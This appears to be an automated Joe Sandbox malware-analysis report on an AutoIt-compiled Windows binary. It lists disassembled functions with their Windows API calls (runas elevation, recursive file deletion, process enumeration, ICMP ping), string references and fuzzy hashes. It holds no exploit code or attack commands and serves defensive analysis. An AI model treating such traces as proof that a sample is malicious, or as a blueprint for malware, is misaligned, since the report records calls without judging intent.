                                                                                                                                                                                                                                                                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,00AE2418,00AE2400,?,?,?,?,?,?,00A13368,?), ref: 00A1343A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A18577: _wcslen.LIBCMT ref: 00A1858A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00A13462,00AE2418,?,?,?,?,?,?,?,00A13368,?), ref: 00A142A0
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,00000001,00AE2418,?,?,?,?,?,?,?,00A13368,?), ref: 00A134BB
                                                                                                                                                                                                                                                                                                    • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00A53CB0
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,00AE2418,?,?,?,?,?,?,?,00A13368,?), ref: 00A53CF1
                                                                                                                                                                                                                                                                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00AD31F4,00AE2418,?,?,?,?,?,?,?,00A13368), ref: 00A53D7A
                                                                                                                                                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 00A53D81
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A134D3: GetSysColorBrush.USER32(0000000F), ref: 00A134DE
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A134D3: LoadCursorW.USER32(00000000,00007F00), ref: 00A134ED
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A134D3: LoadIconW.USER32(00000063), ref: 00A13503
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A134D3: LoadIconW.USER32(000000A4), ref: 00A13515
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A134D3: LoadIconW.USER32(000000A2), ref: 00A13527
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A134D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00A1353F
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A134D3: RegisterClassExW.USER32(?), ref: 00A13590
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A135B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A135E1
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A135B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A13602
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A135B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00A13368,?), ref: 00A13616
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A135B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00A13368,?), ref: 00A1361F
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A13A3C
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • AutoIt, xrefs: 00A53CA5
                                                                                                                                                                                                                                                                                                    • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00A53CAA
                                                                                                                                                                                                                                                                                                    • runas, xrefs: 00A53D75
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                                                                                                                                                                                                                                    • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                                                                                                                                                                                                                    • API String ID: 683915450-2030392706

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A15851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A155D1,?,?,00A54B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00A15871
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7EAB0: GetFileAttributesW.KERNEL32(?,00A7D840), ref: 00A7EAB1
                                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00A7DCCB
                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 00A7DD1B
                                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00A7DD2C
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00A7DD43
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00A7DD4C
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                                                                                                                                                    • String ID: \*.*
                                                                                                                                                                                                                                                                                                    • API String ID: 2649000838-1173974218

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    control_flow_graph 1574 a7dd87-a7ddcf CreateToolhelp32Snapshot Process32FirstW call a7e80e 1577 a7de7d-a7de80 1574->1577 1578 a7de86-a7de95 CloseHandle 1577->1578 1579 a7ddd4-a7dde3 Process32NextW 1577->1579 1579->1578 1580 a7dde9-a7de58 call a1bf73 * 2 call a1b329 call a1568e call a1bd98 call a17bb5 call a2e36b 1579->1580 1595 a7de62-a7de69 1580->1595 1596 a7de5a-a7de5c 1580->1596 1598 a7de6b-a7de78 call a1bd98 * 2 1595->1598 1597 a7de5e-a7de60 1596->1597 1596->1598 1597->1595 1597->1598 1598->1577
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00A7DDAC
                                                                                                                                                                                                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00A7DDBA
                                                                                                                                                                                                                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00A7DDDA
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00A7DE87
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 420147892-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 1a4580cfe267e50719e0432dae66c59c0506cf66ff43943c001698b79fd135ae
                                                                                                                                                                                                                                                                                                    • Instruction ID: b9c2c9ba41733ea563a1162114767634c870cab87e52ff606bd9b9ea6bb33841
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a4580cfe267e50719e0432dae66c59c0506cf66ff43943c001698b79fd135ae
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 11319F711083019FD311EF60DC85AAFBBF8EF99350F04492DF586871A1EB719989CBA2
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CloseHandleMemoryProtectVirtual
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2407445808-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                                                    • Instruction ID: 7c9ff483ff0ca20d46c6562544df72464323d5068c9dc9ab5904de70767324f1
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D31A071A00105DFD718DF58D4A0A69FBB6FB5A300F2486A5E44ACB656D732EDC1CBC0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetInputState.USER32 ref: 00A1EF07
                                                                                                                                                                                                                                                                                                    • timeGetTime.WINMM ref: 00A1F107
                                                                                                                                                                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A1F228
                                                                                                                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 00A1F27B
                                                                                                                                                                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 00A1F289
                                                                                                                                                                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A1F29F
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 00A1F2B1
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2189390790-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 450d346359423645320378967bbf43810a8afbad3152911e473b65cb753cf663
                                                                                                                                                                                                                                                                                                    • Instruction ID: 787efad07810a24b714d2a4b94c579a6b99861de6678f383bbb4c57e8cb397c0
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 450d346359423645320378967bbf43810a8afbad3152911e473b65cb753cf663
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B232E031604382EFDB28CF24C884BEAB7F5BF85304F144629F9568B291D775E985CB92

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00A13657
                                                                                                                                                                                                                                                                                                    • RegisterClassExW.USER32(00000030), ref: 00A13681
                                                                                                                                                                                                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A13692
                                                                                                                                                                                                                                                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00A136AF
                                                                                                                                                                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A136BF
                                                                                                                                                                                                                                                                                                    • LoadIconW.USER32(000000A9), ref: 00A136D5
                                                                                                                                                                                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A136E4
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                                                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                                                                                                                    • API String ID: 2914291525-1005189915
                                                                                                                                                                                                                                                                                                    • Opcode ID: 5adc9ba420bebb821564fef23d83950efc801ae222c60b553f9dfa2cd7b6fb2a
                                                                                                                                                                                                                                                                                                    • Instruction ID: d89024a8ce8b881467174b4437ed78e592bf92a2d88d6df50271a6b780173e5c
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5adc9ba420bebb821564fef23d83950efc801ae222c60b553f9dfa2cd7b6fb2a
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CB21E0B1D01259AFDB04DFE4E889BDDBBB8FB09710F00511AF652AA6A0D7B545428F90

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A5071A: CreateFileW.KERNEL32(00000000,00000000,?,00A50A84,?,?,00000000,?,00A50A84,00000000,0000000C), ref: 00A50737
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00A50AEF
                                                                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00A50AF6
                                                                                                                                                                                                                                                                                                    • GetFileType.KERNEL32(00000000), ref: 00A50B02
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00A50B0C
                                                                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00A50B15
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00A50B35
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00A50C7F
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00A50CB1
                                                                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00A50CB8
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                                                                                    • String ID: H
                                                                                                                                                                                                                                                                                                    • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                                                                                    • Opcode ID: bc1b58877af328c7073f7e38f7a35460ad2e92e074cdc2d6c7d4141f6bd52794
                                                                                                                                                                                                                                                                                                    • Instruction ID: 14b513ec0a88a14ecfe664182aa40373be408ce6397d0ed0c7ccd3e427723d81
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bc1b58877af328c7073f7e38f7a35460ad2e92e074cdc2d6c7d4141f6bd52794
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5BA11232A142598FDF19EFB8D892BAE7BA0BB06325F14015AFC11DF2E1D7319806CB51

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A15594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00A54B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00A155B2
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A15238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00A1525A
                                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00A153C4
                                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00A54BFD
                                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00A54C3E
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00A54C80
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A54CE7
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A54CF6
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                                                                                                                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                                                                                                                                                    • API String ID: 98802146-2727554177
                                                                                                                                                                                                                                                                                                    • Opcode ID: 724a4f7ddd59432277bb939d2f940d87fb91791785d4590a395007cb9b0d73da
                                                                                                                                                                                                                                                                                                    • Instruction ID: b117f1d0d63ec0267ccdb2e93bcd98d47f0ad6254a6b52513faf5c260362c327
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 724a4f7ddd59432277bb939d2f940d87fb91791785d4590a395007cb9b0d73da
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 14717E725043419EC704DFA5D985DABBBF8FF99350F80442DF4418B1A0EB71DA8ACB62

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00A134DE
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00A134ED
                                                                                                                                                                                                                                                                                                    • LoadIconW.USER32(00000063), ref: 00A13503
                                                                                                                                                                                                                                                                                                    • LoadIconW.USER32(000000A4), ref: 00A13515
                                                                                                                                                                                                                                                                                                    • LoadIconW.USER32(000000A2), ref: 00A13527
                                                                                                                                                                                                                                                                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00A1353F
                                                                                                                                                                                                                                                                                                    • RegisterClassExW.USER32(?), ref: 00A13590
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A13624: GetSysColorBrush.USER32(0000000F), ref: 00A13657
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A13624: RegisterClassExW.USER32(00000030), ref: 00A13681
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A13624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A13692
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A13624: InitCommonControlsEx.COMCTL32(?), ref: 00A136AF
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A13624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A136BF
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A13624: LoadIconW.USER32(000000A9), ref: 00A136D5
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A13624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A136E4
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                                                                                                    • String ID: #$0$AutoIt v3
                                                                                                                                                                                                                                                                                                    • API String ID: 423443420-4155596026

                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • WSAStartup.WS2_32(00000101,?), ref: 00A91019
                                                                                                                                                                                                                                                                                                    • inet_addr.WSOCK32(?), ref: 00A91079
                                                                                                                                                                                                                                                                                                    • gethostbyname.WS2_32(?), ref: 00A91085
                                                                                                                                                                                                                                                                                                    • IcmpCreateFile.IPHLPAPI ref: 00A91093
                                                                                                                                                                                                                                                                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00A91123
                                                                                                                                                                                                                                                                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00A91142
                                                                                                                                                                                                                                                                                                    • IcmpCloseHandle.IPHLPAPI(?), ref: 00A91216
                                                                                                                                                                                                                                                                                                    • WSACleanup.WSOCK32 ref: 00A9121C
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                                                                                                                                                    • String ID: Ping
                                                                                                                                                                                                                                                                                                    • API String ID: 1028309954-2246546115

                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00A13709,?,?), ref: 00A13777
                                                                                                                                                                                                                                                                                                    • KillTimer.USER32(?,00000001,?,?,?,?,?,00A13709,?,?), ref: 00A137A3
                                                                                                                                                                                                                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A137C6
                                                                                                                                                                                                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00A13709,?,?), ref: 00A137D1
                                                                                                                                                                                                                                                                                                    • CreatePopupMenu.USER32 ref: 00A137E5
                                                                                                                                                                                                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 00A13806
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
